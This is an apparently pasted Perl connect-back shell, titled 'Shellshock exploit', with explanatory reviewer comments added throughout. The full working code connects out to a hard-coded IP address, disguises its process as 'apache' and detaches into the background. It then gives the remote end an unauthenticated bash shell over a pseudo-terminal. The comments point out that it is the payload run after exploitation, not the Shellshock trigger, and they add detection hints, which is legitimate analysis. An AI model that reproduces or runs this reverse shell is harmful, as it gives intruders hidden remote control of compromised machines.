
Shellshock exploit

a guest Sep 25th, 2014 721 Never
  1. #!/usr/bin/perl -w
  2.  
      # Summary for reviewers: this is a connect-back pseudo-terminal shell. It
      # dials out over TCP to a hard-coded address, allocates a Linux pty, starts
      # a shell on the slave side, and then relays bytes between the socket and
      # the pty master. Nothing in the listing handles a Bash function
      # definition or an HTTP request, so despite the paste title it reads as
      # the payload run once command execution already exists, not as a
      # Shellshock trigger. There is no `use strict`; every variable is a
      # package global.
      #
      # Host artifacts the code below produces: a perl process whose title is
      # "apache", holding /dev/ptmx and one outbound TCP socket, with a getty
      # or bash child attached to /dev/pts/N and its own stdio on /dev/null.
  3. use IO::Socket;
  4. use Fcntl;
  5.  
  6. # IOCTLs
      # Raw Linux request numbers, hard-coded instead of taken from a header:
      # -2147199952 is 0x80045430 (TIOCGPTN) as a signed 32-bit value and
      # 1074025521 is 0x40045431 (TIOCSPTLCK). The encoding is
      # architecture-specific.
  7. $TIOCGPTN = -2147199952;
  8. $TIOCSPTLCK = 1074025521;
      # errno number compared against $! further down. 11 is EAGAIN on common
      # Linux architectures; the Errno/POSIX modules are not used, so the value
      # is not portable.
  9. $EAGAIN=11;
  10.  
  11. print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
  12.  
      # Hard-coded remote endpoint the script connects OUT to. Port 23 is the
      # telnet port, but no telnet negotiation appears anywhere in this file;
      # the stream carries raw pty bytes.
  13. $HOST="72.167.37.182";
  14. $PORT="23";
  15.  
      # Overwrites the process title so process listings show "apache" instead
      # of the perl command line. Detection note: compare the reported name
      # with the real executable (for example /proc/<pid>/exe on Linux).
  16. $0="apache";
  17.  
  18. print "Connecting to $HOST:$PORT... ";
  19.  
      # Non-blocking TCP client socket (indirect-object `new` syntax). The
      # connection is initiated by the machine running the script, so egress
      # filtering and outbound-connection logging are the relevant controls.
  20. $sock = new IO::Socket::INET (
  21.         PeerAddr => $HOST,
  22.         PeerPort => $PORT,
  23.         Proto => 'tcp',
  24.         Blocking => 0,
  25. ) or die $!;
  26.  
  27. print "ok\nAllocatig pseudo terminal... ";
  28.  
  29. ## ptsname
      # Open the pty multiplexer to obtain a new master, then ask the kernel
      # for the slave index; the packed int in $tmp becomes N in /dev/pts/N.
  30. sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
  31. $tmp='';
  32. ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
  33. $pts = unpack('i', $tmp);
  34.  
  35. print "/dev/pts/$pts\nInitializing pseudo terminal... ";
  36.  
  37. ## grantpt not needed on devpts
  38.  
  39. ## unlockpt
      # Passing a packed 0 through TIOCSPTLCK clears the lock so the slave
      # side can be opened.
  40. $unlock=pack('i', 0);
  41. ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
  42.  
  43. ## prepare daemonizing
      # Detach from the launch context: cwd to /, stdin from /dev/null (two-arg
      # open, read mode implied) and a umask of 0, which masks no permission
      # bits on files created afterwards.
  44. chdir '/' or die $!;
  45. open STDIN, '/dev/null' or die $!;
  46. umask 0;
  47.  
  48. print "ok\nForking shell thread...";
  49.  
      # Double fork. The first parent exits, so whatever launched the script
      # sees it return at once; the surviving process forks again and that
      # child becomes the shell while its parent carries on as the relay.
  50. defined($pid = fork) or die $!;
  51. exit if $pid;
  52. defined($pid = fork) or die $!;
  53. if (!$pid) {
              # exec returns only on failure, so each `or` is a fallback. First
              # choice is getty with -n (no login prompt) and -l /bin/bash
              # (program run in place of login), i.e. a shell with no
              # authentication step. Second choice is bash with all three
              # standard streams redirected to the slave pty; that string
              # contains shell metacharacters, so Perl hands it to /bin/sh.
  54.         exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
  55.         exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
  56.         die $!;
  57.         exit;
  58. }        
  59.  
  60. print "ok\nHave fun!\n";
  61.  
      # From here on the relay process is silent: stdout and stderr are
      # appended to /dev/null.
  62. open STDOUT, '>>/dev/null' or die $!;
  63. open STDERR, '>>/dev/null' or die $!;
  64.  
      # Bareword: $pp holds the string "PTMX" and is used later as a symbolic
      # filehandle name, which only works because `use strict` is absent.
  65. $pp = PTMX;
  66. $rin=$win=$ein='';
      # Read set for select(): one bit for the pty master, one for the socket.
      # The write and exception sets stay empty.
  67. vec($rin,fileno($pp),1) =1;
  68. vec($rin,fileno($sock),1) = 1;
  69.  
      # One-argument select picks the default output handle; $|=1 then turns on
      # autoflush for the socket, the pty master and STDOUT in turn.
  70. select $sock;
  71. $|=1;
  72. select PTMX;
  73. $|=1;
  74. select STDOUT;
  75. $|=1;
      # Set to 1 by forwarddata when a read returns end-of-file.
  76. $finished=0;
  77.  
  78. sub forwarddata {
              # Copy everything currently readable on $from to $to.
              # Arguments are two filehandles (for the pty, the symbolic name
              # "PTMX"). No meaningful return value: end-of-stream is reported
              # by setting the global $finished. $rv and $buff are package
              # globals, not lexicals.
  79.         my ($from,$to) = @_;
  80.         while(1) {
  81.                 $rv = sysread($from, $buff, 1024);
                      # undef with EAGAIN: the non-blocking handle has nothing
                      # more to give right now, so hand control back.
  82.                 last if (!defined($rv) && $! == $EAGAIN);      
                      # Any other read error is fatal.
  83.                 defined($rv) or die $!;
                      # A zero-byte read is end-of-file on $from.
  84.                 if ($rv == 0) { $finished = 1; last;}
                      # Write until the whole chunk is out; after a short write
                      # the bytes already sent are cut from the front of $buff.
  85.                 while(length $buff > 0) {
  86.                         $rv = syswrite($to, $buff, length $buff);
  87.                         if (!defined($rv) && $! == $EAGAIN) {
  88.                                 ## try again
                                      # Retries immediately with no wait for
                                      # writability, so this spins on the CPU
                                      # while the destination cannot accept data.
  89.                                 next;
  90.                         }
  91.                         defined($rv) or die $!;
  92.                         last if ($rv == length $buff);
  93.                         substr($buff,0,$rv) = '';
  94.                 }
  95.         }
  96. }
  97.  
  98. while(! $finished) {
              # Relay loop. select blocks (timeout undef) until the pty master
              # or the socket is readable. $rout is never examined: both
              # directions are attempted on every wake-up and the non-blocking
              # reads in forwarddata decide which side actually had data.
  99.         $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
  100.         die $! if ($nfound == -1);
              # pty output goes to the remote peer first, then peer input goes
              # to the pty; either call may set $finished on end-of-file.
  101.         forwarddata($pp,$sock);
  102.         last if $finished;
  103.         forwarddata($sock,$pp);
  104.         last if $finished;
  105. }
       # Either side reached end-of-file: release the pty master and the socket.
  106. close PTMX;
  107. close $sock;